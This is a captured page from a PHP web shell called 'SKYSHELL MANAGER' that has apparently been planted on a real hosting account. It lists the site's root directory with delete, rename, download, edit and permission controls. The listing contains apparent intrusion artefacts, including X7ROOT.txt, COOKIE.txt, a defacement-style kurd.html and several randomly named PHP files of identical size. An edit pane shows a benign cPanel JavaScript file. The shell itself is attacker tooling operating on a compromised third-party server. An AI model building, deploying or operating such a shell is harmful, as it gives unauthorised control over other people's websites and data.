📁
SKYSHELL MANAGER
PHP v8.2.30
Create
Create
Path:
root
/
home
/
qooetu
/
costes.qooetu.com
/
Name
Size
Perm
Actions
📁
.well-known
-
0755
🗑️
🏷️
🔒
📁
2e19d9
-
0755
🗑️
🏷️
🔒
📁
6b114
-
0755
🗑️
🏷️
🔒
📁
Modules
-
0755
🗑️
🏷️
🔒
📁
app
-
0755
🗑️
🏷️
🔒
📁
assets
-
0755
🗑️
🏷️
🔒
📁
bootstrap
-
0755
🗑️
🏷️
🔒
📁
cgi-bin
-
0755
🗑️
🏷️
🔒
📁
config
-
0755
🗑️
🏷️
🔒
📁
css
-
0755
🗑️
🏷️
🔒
📁
database
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
nbproject
-
0755
🗑️
🏷️
🔒
📁
public
-
0755
🗑️
🏷️
🔒
📁
resources
-
0755
🗑️
🏷️
🔒
📁
routes
-
0755
🗑️
🏷️
🔒
📁
storage
-
0755
🗑️
🏷️
🔒
📁
tests
-
0755
🗑️
🏷️
🔒
📁
uploads
-
0755
🗑️
🏷️
🔒
📁
vendor
-
0755
🗑️
🏷️
🔒
📁
wp-admin
-
0755
🗑️
🏷️
🔒
📁
wp-content
-
0755
🗑️
🏷️
🔒
📁
wp-includes
-
0755
🗑️
🏷️
🔒
📄
.htaccess
0.23 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
COOKIE.txt
0.2 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
X7ROOT.txt
0.27 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
defaults.php
1.29 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
engine.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
813.08 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
features.php
11.28 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
googlecfb82e09419fc0f6.html
0.05 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php0
1.56 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
inputs.php
0.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
kurd.html
1.07 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
library.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
min.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
p.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
php.ini
0.04 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
product.php
1.78 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
qpmwztts.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
robots.txt
0.32 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
tovmbkwh.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
tyyffovi.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
veoxv.html
1.23 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: configService.min.js
define(["angular","cjt/util/locale","cjt/io/api","cjt/io/uapi-request","cjt/io/uapi","cjt/services/APIService"],(function(e,t,r,i,n){"use strict";e.module("cpanel.multiPhpManager.service",["cjt2.services.api"]).factory("configService",["$q","APIService",function(e,n){return{convertResponseToList:function(e){var t=[];if(e.status){for(var r=e.data,i=0,n=r.length;i<n;i++){var a=r[i];a.version&&(a.displayPhpVersion=this.transformPhpFormat(a.version)),t.push(a)}var s=e.meta;return{items:t,totalItems:s.paginate.total_records||r.length,totalPages:s.paginate.total_pages||1}}return{items:[],totalItems:0,totalPages:0}},applyDomainSetting:function(t,n){var a=e.defer(),s=new i.Class;return s.initialize("LangPHP","php_set_vhost_versions"),s.addArgument("version",t),void 0!==n&&n.length>0&&n.forEach((function(e,t){s.addArgument("vhost-"+t,e)})),r.promise(s.getRunArguments()).done((function(e){(e=e.parsedResponse).status?a.resolve(e.data):a.reject(e)})),a.promise},fetchList:function(t){var n=e.defer(),a=this,s=new i.Class;return s.initialize("LangPHP","php_get_vhost_versions"),t&&(t.sortBy&&t.sortDirection&&s.addSorting(t.sortBy,t.sortDirection,t.sortType),t.currentPage&&s.addPaging(t.currentPage,t.pageSize||10),t.filterBy&&t.filterCompare&&t.filterValue&&s.addFilter(t.filterBy,t.filterCompare,t.filterValue)),r.promise(s.getRunArguments()).done((function(e){if((e=e.parsedResponse).status){var t=a.convertResponseToList(e);n.resolve(t)}else n.reject(e.error)})),n.promise},fetchImpactedDomains:function(e,t){var r=new i.Class,a=new n;return r.initialize("LangPHP","php_get_impacted_domains"),r.addArgument(e,t),a.deferred(r).promise},friendlyPhpFormat:function(e){var r=e||"",i=/^\D+-(php)(\d{2,3})$/i;if(i.test(e)&&(r="PHP "+e.match(i)[2].replace(/(\d)$/,".$1"),!window.PAGE||!window.PAGE.suppress_php_eol_status))if(0===e.indexOf("alt-"))r+=" ["+t.maketext("Secured")+"]";else{let i=e.match(/php(\d+)/);if(i&&i[1]){parseInt(i[1])<parseInt(String(window.PAGE.oldest_supported_php_version).replace(".",""))&&(r=r+" ["+t.maketext("Outdated")+"]")}}return r},transformPhpFormat:function(e){e=e||"";var t=this.friendlyPhpFormat(e);return""!==t&&t!==e?t+" ("+e+")":e},getEA4Recommendations:function(){var e=new i.Class,t=new n;return e.initialize("EA4","get_recommendations"),t.deferred(e).promise},getCustomRecommendations:function(){var e=new i.Class,t=new n;return e.initialize("EA4","get_php_recommendations"),t.deferred(e).promise}}}])}));
Save